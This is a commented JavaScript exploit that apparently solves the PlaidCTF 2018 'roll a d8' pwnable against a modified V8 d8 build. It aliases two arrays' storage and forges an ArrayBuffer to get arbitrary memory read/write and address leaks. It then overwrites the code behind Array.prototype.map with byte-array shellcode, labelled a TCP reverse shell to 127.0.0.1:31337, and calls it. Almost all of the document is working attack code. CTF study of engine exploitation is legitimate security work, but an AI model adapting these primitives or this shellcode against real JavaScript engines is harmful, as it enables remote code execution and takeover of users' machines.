- // PlaidCTF 2018 - Pwnable - roll a d8 - 350 pts
- /**
-  * Builds a memory-access primitive (read32 / write32 / write / addrof) out of
-  * two JS arrays whose element storage ends up aliased (see the original note
-  * after the two Array.from.call loops) plus a hand-built object that a
-  * DataView is then made to treat as an ArrayBuffer.
-  *
-  * NOTE(review): the aliasing step only works against the challenge's
-  * modified d8 build - nothing on this page shows the underlying engine bug,
-  * and every numeric constant below (0x40, 0x1a0, 6*8, the map-like words in
-  * fake_ab[1..2]) is specific to that build's object layout. Most helper
-  * locals (f64, d, u32, f, l, ab_p*, fabv*, fab) are assigned without
-  * let/var/const, so they leak as implicit globals and would throw under
-  * 'use strict'.
-  *
-  * @returns {{read32: Function, write32: Function, write: Function, addrof: Function}}
-  */
- function Memory() {
- let oobArray = [1.1];
- let packed = [0, {}];
- // Number of values each custom iterator yields before it shrinks its array.
- let maxSize = 1028 * 8;
- // Reinterpret one double as its two 32-bit halves; returns a Uint32Array(2)
- // indexed as [lo, hi] (little-endian view over the same buffer).
- function d2u(v) {
- f64 = new Float64Array(1);
- f64[0] = v;
- d = new Uint32Array(f64.buffer);
- return d;
- }
- // Inverse of d2u: pack two 32-bit words [lo, hi] into one double.
- function u2d(lo, hi) {
- u32 = new Uint32Array(2);
- u32[0] = lo;
- u32[1] = hi;
- f = new Float64Array(u32.buffer);
- return f[0];
- }
- // Array.from is called with a "constructor" that just hands back oobArray, so
- // the values are written into oobArray itself. The iterator yields
- // 0..maxSize-1 and, on the final step, sets oobArray.length = 0 while the
- // fill is still in progress.
- Array.from.call(function() { return oobArray }, {[Symbol.iterator] : _ => (
- {
- counter : 0,
- next() {
- let result = this.counter++;
- if (this.counter > maxSize) {
- oobArray.length = 0;
- return {done: true};
- } else {
- return {value: result, done: false};
- }
- }
- }
- ) });
- // Same sequence for `packed`, whose second element is an object rather than a double.
- Array.from.call(function() { return packed }, {[Symbol.iterator] : _ => (
- {
- counter : 0,
- next() {
- let result = this.counter++;
- if (this.counter > maxSize) {
- packed.length = 0;
- return {done: true};
- } else {
- return {value: result, done: false};
- }
- }
- }
- ) });
- // At this point the element storage of oobArray and packed points to the same
- // address (original author's note), so a value stored through one array can be
- // read back through the other with a different element type.
- // From here we can leak an object's address.
- var ab = new ArrayBuffer(0x100);
- // Store obj via `packed`, read the same slot as a double via `oobArray`, and
- // split it into [lo, hi]. The low word is decremented by 1 - presumably to strip
- // a pointer tag, TODO confirm against the target build.
- function _addrof(obj) {
- packed[1] = obj;
- l = d2u(oobArray[1]);
- l[0] -= 0x1;
- return l;
- }
- // leak ArrayBuffer prototype to fake an ArrayBuffer
- ab_p = _addrof(ab.__proto__);
- ab_p_lo = ab_p[0];
- ab_p_hi = ab_p[1];
- // faking ArrayBuffer: 22 doubles, of which slots 0-14 are overwritten with
- // constructed 64-bit words. Slots 3 and 4 derive from the leaked prototype
- // address; slots 10-13 are later used as the backing-store pointer / length
- // fields reached through the DataView (see set_addr). The remaining fixed
- // words are layout constants of the target build and are not explained on
- // this page.
- var fake_ab = [ 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1, 1.1];
- fake_ab[0] = u2d(0x0, 0x0);
- fake_ab[1] = u2d(0x110a0a0a, 0x0d000423);
- fake_ab[2] = u2d(0x082003ff, 0x0);
- fake_ab[3] = u2d(ab_p_lo, ab_p_hi);
- fake_ab[4] = u2d(ab_p_lo - 0x1a0, ab_p_hi);
- fake_ab[5] = u2d(0x0, 0x0);
- fake_ab[6] = u2d(0x0, 0x0);
- fake_ab[7] = u2d(0x0, 0x0);
- fake_ab[8] = u2d(0x0, 0x0);
- fake_ab[9] = u2d(0x0, 0x1000);
- fake_ab[10] = u2d(0x12345678, 0x0);
- fake_ab[11] = u2d(0x12345678, 0x0);
- fake_ab[12] = u2d(0x100, 0x0);
- fake_ab[13] = u2d(0x4, 0x0);
- fake_ab[14] = u2d(0x0, 0x0);
- //%DebugPrint(fake_ab);
- // Now that fake_ab's own address is known, point slots 6-8 back into it and
- // overwrite the aliased slot so that packed[1] reads back as a reference to
- // the fake object (`fab`) instead of the raw double.
- fabv = _addrof(fake_ab);
- fabv_lo = fabv[0];
- fabv_hi = fabv[1];
- fake_ab[6] = u2d(fabv_lo + 0x40 + 0x1, fabv_hi);
- fake_ab[7] = u2d(fabv_lo + 0x40 + 0x1, fabv_hi);
- fake_ab[8] = u2d(fabv_lo + 0x40 + 0x1, fabv_hi);
- oobArray[1] = u2d(0x40+6*8+fabv_lo+0x1, fabv_hi);
- fab = packed[1];
- //%DebugPrint(fab);
- // The DataView accepts `fab` as its buffer; from here on every access at
- // offset 0 goes to whatever address set_addr last wrote into fake_ab[10..11].
- var dv = new DataView(fab);
- //%DebugPrint(dv);
- // Retarget the DataView: addr is [lo, hi] as returned by _addrof.
- function set_addr(addr) {
- fake_ab[10] = u2d(addr[0], addr[1]);
- fake_ab[11] = u2d(addr[0], addr[1]);
- }
- return {
- // Read a little-endian u32 at addr ([lo, hi]).
- read32(addr) {
- set_addr(addr);
- return dv.getUint32(0, true);
- },
- // Write a little-endian u32 at addr ([lo, hi]).
- write32(addr, value) {
- set_addr(addr);
- dv.setUint32(0, value, true);
- },
- // Write arr (array of byte values) starting at addr, one byte at a time.
- write(addr, arr) { // Uint8 arr
- set_addr(addr);
- for (var i=0; i<arr.length; i++)
- dv.setUint8(i, arr[i]);
- },
- // Address of obj as a Uint32Array(2) indexed [lo, hi].
- addrof(obj) {
- return _addrof(obj); // returns [low, high]
- }
- }
- }
- // Entry point: take the address of a builtin function object and read, from a
- // fixed offset inside it, the pointer to the code that runs when it is called.
- // The offsets (6*8, +0x4) and the -0x1 / +0x60 adjustment are specific to the
- // challenge's d8 build and are not documented on this page. mem, func_addr,
- // jit_lo, jit_hi and jit_addr are all sloppy-mode implicit/`var` globals.
- var mem = Memory();
- var func = Array.prototype.map;
- func_addr = mem.addrof(func);
- func_addr[0] += 6*8;
- jit_lo = mem.read32(func_addr) - 0x1 + 0x60;
- console.log("jit_lo @ 0x" + jit_lo.toString(16));
- func_addr[0] += 0x4;
- jit_hi = mem.read32(func_addr);
- console.log("jit_hi @ 0x" + jit_hi.toString(16));
- // [lo, hi] address of the code region that the next step overwrites.
- jit_addr = [jit_lo, jit_hi];
- // TCP REVERSE SHELL -> 127.0.0.1:31337
- sh = [0x48, 0x31, 0xc0, 0x48, 0x31, 0xff, 0x48, 0x31, 0xf6, 0x48, 0x31, 0xd2, 0x4d, 0x31, 0xc0, 0x6a, 0x02, 0x5f, 0x6a, 0x01, 0x5e, 0x6a, 0x06, 0x5a, 0x6a, 0x29, 0x58, 0x0f, 0x05, 0x49, 0x89, 0xc0, 0x48, 0x31, 0xf6, 0x4d, 0x31, 0xd2, 0x41, 0x52, 0xc6, 0x04, 0x24, 0x02, 0x66, 0xc7, 0x44, 0x24, 0x02, 0x7a, 0x69, 0xc7, 0x44, 0x24, 0x04, 0x7f, 0x0, 0x0, 0x01, 0x48, 0x89, 0xe6, 0x6a, 0x10, 0x5a, 0x41, 0x50, 0x5f, 0x6a, 0x2a, 0x58, 0x0f, 0x05, 0x48, 0x31, 0xf6, 0x6a, 0x03, 0x5e, 0x48, 0xff, 0xce, 0x6a, 0x21, 0x58, 0x0f, 0x05, 0x75, 0xf6, 0x48, 0x31, 0xff, 0x57, 0x57, 0x5e, 0x5a, 0x48, 0xbf, 0x2f, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x48, 0xc1, 0xef, 0x08, 0x57, 0x54, 0x5f, 0x6a, 0x3b, 0x58, 0x0f, 0x05];
- // Overwrite the code behind Array.prototype.map with the byte array, then call
- // it so the written bytes execute. This step depends on that region being
- // writable from JS - write-protected (W^X) JIT pages would fault here rather
- // than let the write land. The trailing busy loop keeps the process alive
- // after the call.
- mem.write(jit_addr, sh);
- console.log("Running shellcode...")
- func();
- while(true) {
- ;
- }